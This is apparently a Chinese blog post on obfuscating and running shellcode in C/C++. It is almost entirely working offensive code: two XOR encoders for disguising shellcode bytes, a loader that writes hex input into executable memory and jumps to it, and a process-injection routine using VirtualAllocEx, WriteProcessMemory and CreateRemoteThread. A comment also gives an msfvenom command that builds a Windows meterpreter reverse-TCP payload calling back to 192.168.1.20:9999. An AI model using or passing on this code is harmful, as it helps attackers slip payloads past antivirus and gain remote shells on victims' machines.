C/C++ ShellCode 常用加密方式
阿新 • • 發佈:2020-09-11
異或加密ShellCode:
#include <stdio.h> #include <Windows.h> unsigned char buf[] = "\xba\xa9\xb0\x07\x68\xdd\xc3\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"; int main(int argc, char* argv[]) { int password = 1025; unsigned char enShellCode[500]; unsigned char deShellCode[500]; int nLen = sizeof(buf)-1; for (int i = 0; i<nLen; i++) { enShellCode[i] = buf[i] ^ password; printf("\\x%x", enShellCode[i]); } printf("\n"); for (int i = 0; i<nLen; i++) { deShellCode[i] = enShellCode[i] ^ password; printf("\\x%x", deShellCode[i]); } system("pause"); return 0; }
另一種ShellCode加密方式
#include <stdio.h> #include <Windows.h> char ShellCode[] = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"; void encoder(char* input, unsigned char key) { int i = 0, len = 0; FILE * fp; unsigned char * output; len = strlen(input); output = (unsigned char *)malloc(len + 1); for (i = 0; i<len; i++) output[i] = input[i] ^ key; fp = fopen("shellcode.raw", "w+"); fprintf(fp, "\""); for (i = 0; i<len; i++) { fprintf(fp, "\\x%0.2x", output[i]); if ((i + 1) % 16 == 0) fprintf(fp, "\"\n\""); } fprintf(fp, "\";"); fclose(fp); // 輸出加密後的檔案 for (i = 0; i<len; i++) { printf("%0.2x ", output[i]); if ((i + 1) % 16 == 0) { printf("\n"); } } free(output); } int main(int argc,char *argv[]) { encoder(ShellCode, 1233); system("pause"); return 0; }
ShellCode程式碼執行盒
// 生成ShellCode: msfvenom - p windows / meterpreter / reverse_tcp // LHOST = 192.168.1.20 LPORT = 9999 - f c - o shell.log // 去除多餘斜線: cat shell.log | grep -v unsigned| // sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g" #include <stdio.h> #include <Windows.h> int main(int argc, char *argv[]) { unsigned int char_in_hex; char *shellcode = argv[1]; unsigned int iterations = strlen(shellcode); unsigned int memory_allocation = strlen(shellcode) / 2; for (unsigned int i = 0; i< iterations - 1; i++) { sscanf(shellcode + 2 * i, "%2X", &char_in_hex); shellcode[i] = (char)char_in_hex; } void *exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE); memcpy(exec, shellcode, memory_allocation); DWORD ignore; VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore); (*(void(*)()) exec)(); return 0; }
ShellCOde 程序注入
#include <stdio.h>
#include <windows.h>
unsigned char ShellCode[] = "shellcode程式碼";
BOOL InjectShellCode(int Pid)
{
HANDLE Handle, remoteThread;
PVOID remoteBuffer;
Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(Handle);
}
int main(int argc, char *argv[])
{
InjectShellCode(1024);
return 0;
}